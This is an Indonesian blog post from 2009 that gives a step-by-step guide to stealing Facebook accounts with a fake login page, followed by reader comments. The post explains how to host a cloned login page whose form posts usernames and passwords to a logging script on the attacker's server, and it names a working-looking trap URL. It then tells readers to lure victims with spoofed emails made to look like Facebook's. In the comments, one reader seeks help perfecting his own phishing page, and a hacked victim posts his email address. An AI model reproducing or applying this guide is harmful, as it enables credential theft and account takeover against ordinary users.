Hack Facebook Account : mencuri lewat fake login
Setahu gw sih salah satu cara untuk ngedapetin account facebook orang lain yang paling mungkin adalah pake metode social engineering atau keylogging. Tanpa kita bersentuhan dengan pemilik account-nya, keknya agak mustahil nurut gw?
Atau mo pake tool password attacker macam Brutus??? Mmmh… gw kira metode itu malah jadi Facebook Freezer ntar akhirnya… Wkakak…
Udah baca coretan gw tentang Fake Email pake Easymail ? Masih ingat kasus website plesetan www.klikBCA.com punyane Steven Haryanto? Yup… seperti itulah kayaknya yang akan cuba gw share dimari.
Langsung aja, pertama kita kudu punya hosting-an untuk naruh file / script fake login kita. (Atau klo lumayan tajir, boleh tuh borong domain yang hurupnya agak mirip – mirip Facebook macam Steven borong plesetan klikBCA.. )
Untuk file yang musti kita upload ada 3 (index.html, logs.php, logs.txt). Klo bisa, buat Change Permissions untuk ke 3 file tersebut ke 777 ( can read, write and executed )

Khusus untuk file index.html, cari baris ini (klo kita edit pake Macromedia Dreamweaver keknya pada baris ke 38 ) :
<div>It’s free and anyone can join</div></div><div><div id=”reg_box”><form id=”reg” method=”post” action=”http://sirs-banjarnegara.com/Facebook/logs.php“><input type=”hidden” id=”locale” name=”locale” value=”en_US” /><div id=”no_js_box”><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div>
Untuk script action-nya (yang gw bold), kita ganti sesuai lokasi 3 file tersebut kita upload-kan.
Lanjut, cuba test dulu projectnya jalan pa gak. Boleh cuba link ini : http://sirs-banjarnegara.com/Facebook/.
Untuk nyobanya, isikan sembarang account pada username and passwordnya. Lalu klik Sign In.
Dan klo sukses, maka halaman browser kita akan di arahkan pada halaman asli login atempt Facebook .
Lalu coba kita liat hasilnya di file logs.txt-nya. Gmana..?
Langkah terakhir, sebarkan fake email, gunakan tool Easymail atau tool apa kek yang bisa bikin email palsu, dengan sender email dari salah satu account mail resminya Facebook. Untuk messagenya, liat aja email pemberitahuan resmi dari Facebook, buat semirip mungkin, kondisikan yang harus dia klik adalah link ke perangkap yang dah kita pasang.
Dan spertinya, dari sekian banyak pengguna Facebook, paling gak lebih dari 30% yang tahu tipuan model kek gini. Pa lagi yang gunakan mobile untuk mengaksesnya. So, tunggu apa lagi ? Lets Try…!
Tulisan ini review gw dari artikel punyane zian@binushacker
July 26, 2009 at 7:47 pm
mas aku mau minta tolong, gini mas, aku ki blajar komptr ae gak pernah
trus aku coba utak atik ini tp blom sempurna, maklum lahhhh
tolong disempurnakan ya
ini >>>> http://h1.ripway.com/appsfacebookget/index.html
soalnya yg aku buat disitu record ipnya kok beda sama punya anda ya…jd bingung niiii, alias record ip dari yg kubuat itu kok semrawut..tolong disempurnakan…lognya jg sama kok…tinggal ganti kata dibelakngnya hehehe….mohon pencerahannya mas…kirim pesen ke fbku ya mas..artomoro
…salam
July 26, 2009 at 7:58 pm
kotak buat klik loginnya tak rubah,,,ehhhh malah warnanya tadinya biru jadi putih heheheh
July 27, 2009 at 1:51 am
CMIIW ( corect me if i’m wrong ), ip addres yang ada di logs.txt mas pete keknya IP address local yah? trus link index.html kok jadi ngarah ke login attempt dulu yah?
cuba maspete compare dulu 3 file yang maspete buat ma yang maspete dunlud dari aku. soale aku gak bisa comment apa – apa klo gak tahu script mana yang dirubah.
Surry… FB aku udah deactivated. So, gak bisa nulis di wall maspete.
August 22, 2009 at 5:23 am
way of hacking alexa traffic ??? click here
October 3, 2009 at 1:11 am
mas . . tolongin aku donk . . email dan akun facebook ku kena hacker, aku gak tahu hacker yang mana, tiba -tiba aja aku gak bisa login keduanya, lalu aku bikin akun baru, . . eh akun lamaku tiba2 merubah nama akun persis seperti akun yg baru aku buat . . pake sapa salam lagi . . sama aja aku ngomong sama diriku sendiri . . aku cuma bisa sabar aja . . semoga akun lamaku gak dibuat tuk nyakitin orang aja . .
email lama : bas_creative@yahoo.com
akun facebook lama : bas smansaklampok
tolong mas . . bantu saya login ke email saya lagi dan akun facebook yg lama itu . . terima kasih . ..
October 6, 2009 at 5:37 pm
Berharap account email gak dihack juga, cuba pake fasilitas pemulihan password pada halaman http://www.facebook.com/reset.php?locale=en_US. Selama yang nyabotase belum belum ngilangin account email lama anda yang ada di halaman setting account facebook tsb, mungkin masih bisa ketulungan.
Klo bisa, sebaiknya emang account email yang bwat login di facebook dibikin private aja, gak usah di showing ke public.
November 12, 2009 at 10:43 am
cara bikin ripway